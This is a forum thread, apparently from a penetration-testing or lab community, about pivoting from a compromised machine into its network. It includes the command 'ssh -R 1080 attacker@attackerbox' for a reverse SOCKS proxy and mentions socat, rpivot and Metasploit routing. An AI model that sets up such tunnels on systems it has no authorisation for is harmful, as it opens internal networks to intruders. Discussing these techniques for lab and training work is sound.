Reverse SSH tunnel from popped box?

Is this possible? I tried a few different ways to create an SSH tunnel from a popped box to an attacking box, so that I could use proxychains to tunnel traffic into the network of the popped box from the attacker machine. Think of a reverse Socks proxy.

The only way I can get this to work is if I have SSH access (a valid login and ssh set up and running) on the popped box.

Thanks.

Begin this technique is not good OPSEC

If the victim box is running an SSH client > 7.6 you can create a reverse SOCKS proxy listening on your attacker box.

  • ssh(1): add support for reverse dynamic forwarding. In this mode,
    ssh will act as a SOCKS4/5 proxy and forward connections
    to destinations requested by the remote SOCKS client. This mode
    is requested using extended syntax for the -R and RemoteForward
    options and, because it is implemented solely at the client,
    does not require the server be updated to be supported.

Simply run:

ssh -R 1080 attacker@attackerbox

Which is the exact opposite of using the -D flag you’re probably familiar with.

End this technique is not good OPSEC

You need to use valid creds for your attacker box on a victim machine for this to work. You could setup a restricted SSH user but you are much better off dropping socat on their box and binding to a port on their machine. Don’t get hacked trying to be cute homie.

@mrjunkshop said:
Is this possible? I tried a few different ways to create an SSH tunnel from a popped box to an attacking box, so that I could use proxychains to tunnel traffic into the network of the popped box from the attacker machine. Think of a reverse Socks proxy.

The only way I can get this to work is if I have SSH access (a valid login and ssh set up and running) on the popped box.

Thanks.

You actually have socks4 and socks5 auxiliary modules in msf. Or you could just route.

Thanks for the input on this. I found a utility called ‘rpivot’ that does exactly what I was wanted - no metasploit or new version of ssh required.

Hi I am stuck on the part where I need 2 get a reverse tunnel from the Windows host to my attack host.
I am unable to get a reverse using the reverse_https payload.
My pivot machine has a listening port 127.0.0.1:8080 and forward to 0.0.0.0:8000, but I think this is wrong. I cant connect on 172.16.5.15:8080 it will give connection refused.
When i connect locally to 127.0.0.1:8080 it gets forwarded. How can I make it so that it listens on its internal IP instead of its loopback address?